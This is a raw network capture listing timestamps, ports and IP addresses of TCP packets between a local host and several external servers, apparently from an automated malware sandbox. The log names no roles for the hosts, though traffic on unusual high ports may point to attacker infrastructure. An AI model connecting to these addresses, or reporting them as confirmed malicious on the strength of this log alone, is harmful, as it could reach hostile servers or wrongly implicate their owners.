Aug 23, 2022 03:46:18.867997885 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.873688936 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:18.918199062 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.918262959 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.918304920 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.918344021 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.922269106 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:18.966279984 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:18.981841087 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:19.024687052 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:19.075248957 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:19.119096994 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:19.120695114 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:19.164761066 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:19.166832924 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:19.210870981 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:19.213371038 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:19.259841919 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:19.260972023 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:19.308065891 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:19.317456961 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:19.336056948 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:19.338515043 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:19.363491058 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:19.363516092 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:19.479413033 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:19.522887945 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:19.525219917 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:19.568701982 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:19.569195986 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:19.612675905 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:19.613476038 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:19.650187969 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:19.651949883 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:19.667975903 CEST	16525	49960	195.54.170.157	192.168.2.3
Aug 23, 2022 03:46:19.744482994 CEST	49960	16525	192.168.2.3	195.54.170.157
Aug 23, 2022 03:46:19.962858915 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:19.969857931 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:20.280308962 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:20.280347109 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:20.280364990 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:20.281712055 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:20.284585953 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:20.595916033 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:20.781050920 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:21.014045954 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:21.324790955 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:21.326446056 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:21.330594063 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:21.448745012 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:21.515316963 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:21.515391111 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:21.515415907 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:21.515487909 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:21.518934011 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:21.662458897 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:21.662487984 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:21.662504911 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:21.662553072 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:21.662589073 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:21.662662029 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:21.673244953 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:21.675935984 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:21.682224035 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:22.098332882 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:22.581573009 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:23.035501957 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:23.099437952 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:23.108774900 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:23.118848085 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:23.170706987 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:23.170725107 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:23.171432018 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:23.173731089 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:23.236731052 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:23.242094040 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:23.261944056 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:23.304263115 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:23.308274984 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:23.370739937 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:23.372940063 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:23.382385015 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:23.382416010 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:23.435061932 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:23.436836958 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:23.498910904 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:23.582250118 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:23.615781069 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:23.618957043 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:23.682760000 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:23.692848921 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:23.740941048 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:23.749733925 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:23.756231070 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:23.803205013 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:23.892040968 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:23.892044067 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:23.908235073 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:23.969990969 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:23.970017910 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:23.970033884 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:23.970048904 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:23.970071077 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:23.970135927 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:23.970146894 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:23.970190048 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:23.970206976 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:24.031841993 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:24.032097101 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:24.032628059 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:24.032660961 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:24.032809973 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:24.033598900 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:24.061302900 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:24.095187902 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:24.101465940 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:24.154752016 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:24.163595915 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:24.165801048 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:24.227802992 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:24.282685041 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:24.380609989 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:24.451741934 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:24.521873951 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:24.521975040 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:24.523277998 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:24.525132895 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:24.525166988 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:24.527558088 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:24.595174074 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:24.662235975 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:24.664324999 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:24.800657988 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:24.803657055 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:24.832484961 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:24.832653999 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:24.938855886 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:24.942241907 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:24.943526030 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:25.001029968 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:25.011183977 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:25.072884083 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:25.073235989 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:25.077879906 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:25.143490076 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:25.143670082 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:25.152395010 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:25.193826914 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:25.193974018 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:25.283384085 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:25.286767960 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:25.312760115 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:25.446696043 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:25.446722984 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:25.446734905 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:25.446748018 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:25.448734999 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:25.454664946 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:25.454735041 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:25.504453897 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:25.504614115 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:25.582076073 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:25.626281977 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:25.688306093 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:25.688690901 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:25.693480968 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:25.755920887 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:25.757874966 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:25.765491009 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:25.765573978 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:25.814981937 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:25.815079927 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:25.820360899 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:25.824516058 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:25.848014116 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:25.886531115 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:25.887006998 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:25.949301958 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:25.950109959 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:25.982980967 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.012583017 CEST	9582	49969	176.113.115.146	192.168.2.3
Aug 23, 2022 03:46:26.065418005 CEST	49969	9582	192.168.2.3	176.113.115.146
Aug 23, 2022 03:46:26.076616049 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:26.076797009 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:26.098634005 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:26.098699093 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:26.125457048 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:26.125575066 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:26.232080936 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.232112885 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.232135057 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.232152939 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.232167959 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.232183933 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.232186079 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:26.232198000 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.232214928 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.232259989 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:26.232275963 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:26.232290983 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:26.232475996 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.234926939 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.367679119 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.367734909 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.367773056 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.367809057 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.367849112 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.367888927 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.368144989 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.370107889 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:26.387141943 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:26.387233019 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:26.436331034 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:26.436368942 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:26.436428070 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:26.436477900 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:26.504251957 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.507973909 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:26.643457890 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.647150993 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:26.698829889 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:26.698934078 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:26.746961117 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:26.746990919 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:26.747113943 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:26.747169018 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:26.783077955 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.788104057 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:26.788322926 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:26.801332951 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:26.935501099 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.938150883 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:26.939955950 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:26.957233906 CEST	50041	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:46:26.957297087 CEST	443	50041	8.8.4.4	192.168.2.3
Aug 23, 2022 03:46:26.958739996 CEST	50041	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:46:26.958784103 CEST	50041	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:46:26.958796978 CEST	443	50041	8.8.4.4	192.168.2.3
Aug 23, 2022 03:46:27.005655050 CEST	443	50041	8.8.4.4	192.168.2.3
Aug 23, 2022 03:46:27.008865118 CEST	50041	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:46:27.008908987 CEST	443	50041	8.8.4.4	192.168.2.3
Aug 23, 2022 03:46:27.009967089 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:27.010133982 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:27.011894941 CEST	443	50041	8.8.4.4	192.168.2.3
Aug 23, 2022 03:46:27.012032986 CEST	50041	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:46:27.014285088 CEST	50041	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:46:27.014314890 CEST	50041	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:46:27.014487028 CEST	443	50041	8.8.4.4	192.168.2.3
Aug 23, 2022 03:46:27.057138920 CEST	443	50041	8.8.4.4	192.168.2.3
Aug 23, 2022 03:46:27.057439089 CEST	50041	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:46:27.057775974 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:27.057807922 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:27.057866096 CEST	50041	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:46:27.057893038 CEST	443	50041	8.8.4.4	192.168.2.3
Aug 23, 2022 03:46:27.057894945 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:27.075344086 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:27.098870039 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:27.194165945 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:27.286978006 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:27.321135998 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:27.368459940 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:27.369070053 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:27.421849012 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:27.424134970 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:27.482664108 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:27.564310074 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:27.565350056 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:27.777530909 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:27.778410912 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:27.791191101 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:27.915102005 CEST	40915	49984	185.191.229.101	192.168.2.3
Aug 23, 2022 03:46:27.925374031 CEST	49984	40915	192.168.2.3	185.191.229.101
Aug 23, 2022 03:46:28.103269100 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:28.160242081 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:28.471589088 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:28.476753950 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:28.787604094 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:28.788440943 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:29.100020885 CEST	34589	49914	103.89.90.61	192.168.2.3
Aug 23, 2022 03:46:29.298649073 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:29.513946056 CEST	49914	34589	192.168.2.3	103.89.90.61
Aug 23, 2022 03:46:58.815747023 CEST	50072	443	192.168.2.3	104.22.1.232
Aug 23, 2022 03:46:58.815803051 CEST	443	50072	104.22.1.232	192.168.2.3
Aug 23, 2022 03:46:58.815911055 CEST	50072	443	192.168.2.3	104.22.1.232
Aug 23, 2022 03:46:58.821666002 CEST	50072	443	192.168.2.3	104.22.1.232
Aug 23, 2022 03:46:58.821695089 CEST	443	50072	104.22.1.232	192.168.2.3
Aug 23, 2022 03:46:58.861622095 CEST	443	50072	104.22.1.232	192.168.2.3
Aug 23, 2022 03:46:58.861732006 CEST	50072	443	192.168.2.3	104.22.1.232
Aug 23, 2022 03:46:58.863871098 CEST	50072	443	192.168.2.3	104.22.1.232
Aug 23, 2022 03:46:58.863889933 CEST	443	50072	104.22.1.232	192.168.2.3
Aug 23, 2022 03:46:58.864152908 CEST	443	50072	104.22.1.232	192.168.2.3
Aug 23, 2022 03:46:58.885327101 CEST	50072	443	192.168.2.3	104.22.1.232
Aug 23, 2022 03:46:58.927366972 CEST	443	50072	104.22.1.232	192.168.2.3
Aug 23, 2022 03:46:58.959575891 CEST	443	50072	104.22.1.232	192.168.2.3
Aug 23, 2022 03:46:58.960597992 CEST	50072	443	192.168.2.3	104.22.1.232
Aug 23, 2022 03:46:58.960637093 CEST	443	50072	104.22.1.232	192.168.2.3
Aug 23, 2022 03:46:58.960705042 CEST	50072	443	192.168.2.3	104.22.1.232
Aug 23, 2022 03:46:59.000050068 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.000101089 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.000195026 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.000473022 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.000497103 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.042362928 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.042488098 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.044223070 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.044245958 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.045316935 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.047364950 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.088057041 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.088161945 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.088237047 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.088253021 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.088290930 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.088361979 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.088372946 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.088388920 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.088481903 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.088499069 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.088563919 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.088635921 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.088638067 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.088659048 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.088713884 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.088732958 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.089011908 CEST	443	50076	162.159.133.233	192.168.2.3
Aug 23, 2022 03:46:59.089071035 CEST	50076	443	192.168.2.3	162.159.133.233
Aug 23, 2022 03:46:59.089086056 CEST	443	50076	162.159.133.233	192.168.2.3
